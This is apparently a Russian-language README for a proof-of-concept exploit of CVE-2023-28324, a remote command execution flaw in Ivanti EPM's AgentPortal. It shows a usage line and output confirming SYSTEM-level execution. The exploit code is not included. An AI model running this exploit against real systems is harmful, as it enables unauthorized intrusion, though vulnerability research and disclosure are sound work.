
Уязвимость Ivanti EPM AgentPortal RCE
POC для CVE-2023-28324, затрагивающего Ivanti EPM.
Технический анализ первопричины уязвимости можно найти в нашем блоге: https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-28324-deep-dive/
Этот POC эксплуатирует уязвимость в AgentPortal.exe для выполнения произвольных команд. Чтобы этот POC работал, вы должны предоставить собственные ссылки на AgentPortal.exe и APCommon.dll из установки Ivanti EPM.
CVE-2023-28324.exe 192.168.1.21 49668 whoami.exe
Sending request.
Request result: True
Waiting for result.
Waiting for result.
Result: nt authority\system
Данное программное обеспечение создано исключительно в целях академических исследований и разработки эффективных методов защиты и не предназначено для атак на системы, кроме случаев явного разрешения. Сопровождающие проекта не несут ответственности за неправильное использование программного обеспечения. Используйте ответственно.